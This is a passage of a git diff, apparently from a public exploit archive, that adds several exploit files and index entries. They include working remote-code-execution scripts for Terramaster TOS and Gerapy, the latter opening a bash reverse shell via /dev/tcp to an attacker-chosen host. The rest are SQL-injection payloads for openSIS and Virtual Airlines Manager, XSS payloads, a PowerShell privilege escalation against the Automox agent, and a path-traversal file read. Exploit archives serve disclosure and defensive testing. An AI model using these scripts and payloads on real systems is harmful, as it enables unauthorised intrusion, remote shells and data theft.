airport=[SQLi] +[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] + +[3] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[4] Vulnerable GET parameter: plane_location=[SQLi] +[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] + +[5] Vulnerable GET parameter: hub_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] + +[6] Vulnerable GET parameter: pilot_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] + +[7] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[8] Vulnerable GET parameter: event_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] + +[9] Vulnerable GET parameter: tour_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi] \ No newline at end of file diff --git a/exploits/php/webapps/50635.py b/exploits/php/webapps/50635.py new file mode 100755 index 000000000..f41a29d04 --- /dev/null +++ b/exploits/php/webapps/50635.py @@ -0,0 +1,113 @@ +# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 12/24/2021 +# Exploit Author: n0tme (thatsn0tmysite) +# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ +# Vendor Homepage: https://www.terra-master.com/ +# Version: TOS 4.2.X (4.2.15-2107141517) +# Tested on: 4.2.15, 4.2.10 + +#/bin/env python + +import urllib3 +import requests +import json +import argparse +import hashlib +import time +import os + +TARGET = None +MAC_ADDRESS = None +PWD = None +TIMESTAMP = None + +def tos_encrypt_str(toencrypt): + key = MAC_ADDRESS[6:] + return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest() + +def user_session(session, username): + session.cookies.clear() + cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)} + if username == "guest": + cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")} + + for name,value in cookies.items(): + session.cookies[name] = value + +def download(session, path, save_as=None): + user_session(session, "guest") + r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path}) + filename = os.path.basename(path) + if save_as is not None: + filename = save_as + with open(filename, "wb") as file: + file.write(r.content) + +def get_admin_users(session): + download(session, "/etc/group", save_as="/tmp/terramaster_group") + with open("/tmp/terramaster_group", "r") as groups: + for line in groups: + line = line.strip() + fields = line.split(':') + if fields[0] == "admin": + users = fields[3].split(",") + os.remove("/tmp/terramaster_group") + return users + +if __name__ == '__main__': + p = argparse.ArgumentParser() + p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)") + p.add_argument("--cmd", dest="cmd", help="Command to run", default="id") + p.add_argument("-d", "--download", dest="download", help="Only download file", default=None) + p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None) + p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None) + p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR") + p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)") + args = p.parse_args() + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + TARGET = args.target + + s = requests.Session() + if args.tor: + s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"} + s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"}) + + r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS") + try: + j = r.json() + PWD = j["data"]["PWD"] + MAC_ADDRESS = j["data"]["ADDR"] + except KeyError: + exit(1) + + TIMESTAMP = str(int(time.time())) + s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP}) + s.headers.update({"authorization": PWD}) + + if args.download != None: + download(s, args.download, save_as=args.save_as) + exit(0) + + #RCEs + RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23", + f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND + f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND + + for admin in get_admin_users(s): + user_session(s, admin) + if args.create != None: + user, password = args.create.split(":") + groups = json.dumps(["allusers", "admin"]) + r=s.post(f"{TARGET}/module/api.php?mobile/__construct") + r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""}) + if "create user successful!" in str(r.content, "utf8"): + print(r.content) + break + continue + + r = s.get(RCEs[args.rce]) + content = str(r.content, "utf-8") + if "" not in content: + print(content) + exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50637.txt b/exploits/php/webapps/50637.txt new file mode 100644 index 000000000..19cf7b0ab --- /dev/null +++ b/exploits/php/webapps/50637.txt @@ -0,0 +1,60 @@ +# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection +# Date: 26/12/2021 +# Exploit Author: securityforeveryone.com +# Author Mail: hello[AT]securityforeveryone.com +# Vendor Homepage: https://opensis.com +# Software Link: https://opensis.com +# Version: 8.0 Community Edition +# Tested on: Linux/Windows +# Researchers : Security For Everyone Team - https://securityforeveryone.com + +''' + +DESCRIPTION + +A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php. + +The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php. + +Example: + +POST /TransferredOutModal.php?modfunc=detail + +Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 + +if an attacker exploits this vulnerability, attacker may access private data in the database system. + +EXPLOITATION + +POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 +Host: localhost +User-Agent: user-agent +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: cookie +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 69 + +student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 + +Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs + +Example Payloads: + +Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 +Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 +Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + +ABOUT SECURITY FOR EVERYONE TEAM + +We are a team that has been working on cyber security in the industry for a long time. + +In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. + +We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools + +''' \ No newline at end of file diff --git a/exploits/php/webapps/50641.txt b/exploits/php/webapps/50641.txt new file mode 100644 index 000000000..049aa6432 --- /dev/null +++ b/exploits/php/webapps/50641.txt @@ -0,0 +1,22 @@ +# Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) +# Exploit Author: Oscar Gutierrez (m4xp0w3r) +# Date: January 4, 2021 +# Vendor Homepage: https://www.projeqtor.org/en/ +# Software Link: https://www.projeqtor.org/en/product-en/downloads +# Tested on: Ubuntu, LAAMP +# Vendor: Projeqtor +# Version: v9.3.1 + +# Exploit Description: +Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application. + +# Steps to reproduce: +Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute. + + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/50643.txt b/exploits/php/webapps/50643.txt new file mode 100644 index 000000000..11bef17da --- /dev/null +++ b/exploits/php/webapps/50643.txt @@ -0,0 +1,16 @@ +# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated) +# Date: 04/01/2022 +# Exploit Author: Andrea Bocchetti +# Vendor Homepage: https://getaawp.com/ +# Software Link: https://getaawp.com/ +# Version: 3.16 +# Tested on: Windows 10 - Chrome, WordPress 5.8.2 + +# Proof of Concept: +# 1- Install and activate AAWP 3.16 plugin. +# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX +# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y +# 4- XSS has been triggered. + +# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y" +XSS will trigger. \ No newline at end of file diff --git a/exploits/python/remote/50640.py b/exploits/python/remote/50640.py new file mode 100755 index 000000000..ab934840a --- /dev/null +++ b/exploits/python/remote/50640.py @@ -0,0 +1,130 @@ +# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 03/01/2022 +# Exploit Author: Jeremiasz Pluta +# Vendor Homepage: https://github.com/Gerapy/Gerapy +# Version: All versions of Gerapy prior to 0.9.8 +# CVE: CVE-2021-43857 +# Tested on: Gerapy 0.9.6 + +# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. + +#!/usr/bin/python +import sys +import re +import argparse +import pyfiglet +import requests +import time +import json +import subprocess + +banner = pyfiglet.figlet_format("CVE-2021-43857") +print(banner) +print('Exploit for CVE-2021-43857') +print('For: Gerapy < 0.9.8') + +login = "admin" #CHANGE ME IF NEEDED +password = "admin" #CHANGE ME IF NEEDED + +class Exploit: + + def __init__(self, target_ip, target_port, localhost, localport): + self.target_ip = target_ip + self.target_port = target_port + self.localhost = localhost + self.localport = localport + + def exploitation(self): + payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}""" + + #Login to the app (getting auth token) + url = "http://" + target_ip + ":" + target_port + r = requests.Session() + print("[*] Resolving URL...") + r1 = r.get(url) + time.sleep(3) + print("[*] Logging in to application...") + r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True) + time.sleep(3) + if (r2.status_code == 200): + print('[*] Login successful! Proceeding...') + else: + print('[*] Something went wrong!') + quit() + + #Create a header out of auth token (yep, it's bad as it looks) + dict = json.loads(r2.text) + temp_token = 'Token ' + temp_token2 = json.dumps(dict['token']).strip('"') + auth_token = {} + auth_token['Authorization'] = temp_token + temp_token2 + + #Get the project list + print("[*] Getting the project list") + r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True) + time.sleep(3) + + if (r3.status_code != 200): + print("[!] Something went wrong! Maybe the token is corrupted?") + quit(); + + #Parse the project name for a request (yep, it's worse than earlier) + dict = r3.text # [{'name': 'test'}] + dict2 = json.dumps(dict) + dict3 = json.loads(dict2) + dict3 = json.loads(dict3) + name = dict3[0]['name'] + print("[*] Found project: " + name) + + #use the id to check the project + print("[*] Getting the ID of the project to build the URL") + r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True) + time.sleep(3) + if (r4.status_code != 200): + print("[*] Something went wrong! I can't reach the found project!") + quit(); + + #format the json to dict + dict = r4.text + dict2 = json.dumps(dict) + dict3 = json.loads(dict2) + dict3 = json.loads(dict3) + id = dict3['id'] + print("[*] Found ID of the project: ", id) + time.sleep(1) + + #netcat listener + print("[*] Setting up a netcat listener") + listener = subprocess.Popen(["nc", "-nvlp", self.localport]) + time.sleep(3) + + #exec the payload + print("[*] Executing reverse shell payload") + print("[*] Watchout for shell! :)") + r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True) + listener.wait() + + if (r5.status_code == 200): + print("[*] It worked!") + listener.wait() + else: + print("[!] Something went wrong!") + listener.terminate() + +def get_args(): + parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)') + parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') + parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') + parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP') + parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port') + args = parser.parse_args() + return args + +args = get_args() +target_ip = args.url +target_port = args.target_port +localhost = args.localhost +localport = args.localport + +exp = Exploit(target_ip, target_port, localhost, localport) +exp.exploitation() \ No newline at end of file diff --git a/exploits/windows/local/50633.txt b/exploits/windows/local/50633.txt new file mode 100644 index 000000000..f6ec8e962 --- /dev/null +++ b/exploits/windows/local/50633.txt @@ -0,0 +1,32 @@ +# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path +# Discovery by: Yehia Elghaly +# Date: 30-12-2021 +# Vendor Homepage: https://www.trigonesoft.com/ +# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe +# Tested Version: 3.61 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 7 x86 - Windows Server 2016 x64 + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +TRIGONE Remote System Monitor Server RemoteSystemMonitorService +C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe +Auto + +C:\>sc qc srvInventoryWebServer +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: RemoteSystemMonitorService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv +er\RemoteSystemMonitorService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : TRIGONE Remote System Monitor Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50642.ps1 b/exploits/windows/local/50642.ps1 new file mode 100644 index 000000000..66ff1b830 --- /dev/null +++ b/exploits/windows/local/50642.ps1 @@ -0,0 +1,42 @@ +# Exploit Title: Automox Agent 32 - Local Privilege Escalation +# Date: 13/12/2021 +# Exploit Author: Greg Foss +# Writeup: https://www.lacework.com/blog/cve-2021-43326/ +# Vendor Homepage: https://www.automox.com/ +# Software Link: https://support.automox.com/help/agents +# Version: 31, 32, 33 +# Tested on: Windows 10 +# Language: PowerShell +# CVE: CVE-2021-43326 + +New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\ +$payload = "whoami >> $HOME\Desktop\automox\who.txt" +echo "" +echo "Watching for Automox agent interaction..." +echo "" +for (($i = 0); $i -lt 500; $i++) { + if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) { + try { + $dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name + $dir = $dir.name + $file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name + $file = $file.name + (Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file + cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\ + echo 'popped :-)' + Start-Sleep 5 + echo '' + echo 'cloning all powershell script content...' + for (($i = 0); $i -lt 100; $i++) { + cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force + Start-Sleep 1 + } + exit + } catch { + throw $_.Exception.Message + } + } else { + echo $i + Start-Sleep 1 + } +} \ No newline at end of file diff --git a/exploits/windows/remote/50638.txt b/exploits/windows/remote/50638.txt new file mode 100644 index 000000000..78f04514d --- /dev/null +++ b/exploits/windows/remote/50638.txt @@ -0,0 +1,12 @@ +# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) +# Date: 03/01/2022 +# Exploit Author: Fabiano Golluscio @ Swascan +# Vendor Homepage: https://www.solari.it/it/ +# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/ +# Version: 3.24.0.2 +# Fixed Version: 3.26.1.7 +# Reference: https://www.swascan.com/solari-di-udine/ + +POC + +curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b35b3da60..78db1d768 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6808,6 +6808,7 @@ id,file,description,date,author,type,platform,port 50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, 50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, 50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows, +50613,exploits/hardware/dos/50613.py,"Siemens S7 Layer 2 - Denial of Service (DoS)",1970-01-01,RoseSecurity,dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux, @@ -11426,6 +11427,8 @@ id,file,description,date,author,type,platform,port 50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows, 50591,exploits/macos/local/50591.py,"Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)",1970-01-01,leonjza,local,macos, 50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows, +50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows, +50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18584,6 +18587,12 @@ id,file,description,date,author,type,platform,port 50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java, 50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java, 50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows, +50618,exploits/multiple/remote/50618.py,"ConnectWise Control 19.2.24707 - Username Enumeration",1970-01-01,"Luca Cuzzolin",remote,multiple, +50620,exploits/hardware/remote/50620.py,"Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",remote,hardware, +50629,exploits/android/remote/50629.py,"AWebServer GhostBuilding 18 - Denial of Service (DoS)",1970-01-01,"Andres Ramos",remote,android, +50638,exploits/windows/remote/50638.txt,"TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Fabiano Golluscio",remote,windows, +50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware, +50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44691,3 +44700,26 @@ id,file,description,date,author,type,platform,port 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",1970-01-01,citril,webapps,php, 50610,exploits/php/webapps/50610.py,"phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50611,exploits/php/webapps/50611.txt,"Exponent CMS 2.6 - Multiple Vulnerabilities",1970-01-01,heinjame,webapps,php, +50612,exploits/php/webapps/50612.txt,"CMSimple 5.4 - Cross Site Scripting (XSS)",1970-01-01,heinjame,webapps,php, +50614,exploits/php/webapps/50614.txt,"RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)",1970-01-01,faisalfs10x,webapps,php, +50615,exploits/php/webapps/50615.txt,"RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php, +50616,exploits/php/webapps/50616.txt,"RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,faisalfs10x,webapps,php, +50617,exploits/php/webapps/50617.txt,"WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Gaetano Perrone",webapps,php, +50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",1970-01-01,"Ron Jost",webapps,php, +50621,exploits/php/webapps/50621.py,"Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php, +50622,exploits/php/webapps/50622.py,"Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)",1970-01-01,Tagoletta,webapps,php, +50623,exploits/php/webapps/50623.py,"Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php, +50624,exploits/php/webapps/50624.py,"WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Liad Levy",webapps,php, +50625,exploits/php/webapps/50625.txt,"Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php, +50626,exploits/php/webapps/50626.txt,"SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,php, +50627,exploits/php/webapps/50627.txt,"Nettmp NNT 5.1 - SQLi Authentication Bypass",1970-01-01,"Momen Eldawakhly",webapps,php, +50628,exploits/php/webapps/50628.txt,"Hostel Management System 2.1 - Cross Site Scripting (XSS)",1970-01-01,"Chinmay Divekar",webapps,php, +50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",1970-01-01,twseptian,webapps,php, +50632,exploits/multiple/webapps/50632.txt,"BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,Malcrove,webapps,multiple, +50631,exploits/php/webapps/50631.txt,"Hospitals Patient Records Management System 1.0 - Account TakeOver",1970-01-01,twseptian,webapps,php, +50634,exploits/php/webapps/50634.txt,"Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection",1970-01-01,"Milad karimi",webapps,php, +50635,exploits/php/webapps/50635.py,"Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,n0tme,webapps,php, +50636,exploits/hardware/webapps/50636.py,"Vodafone H-500-s 3.5.10 - WiFi Password Disclosure",1970-01-01,"Daniel Monzón",webapps,hardware, +50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php, +50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php, +50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,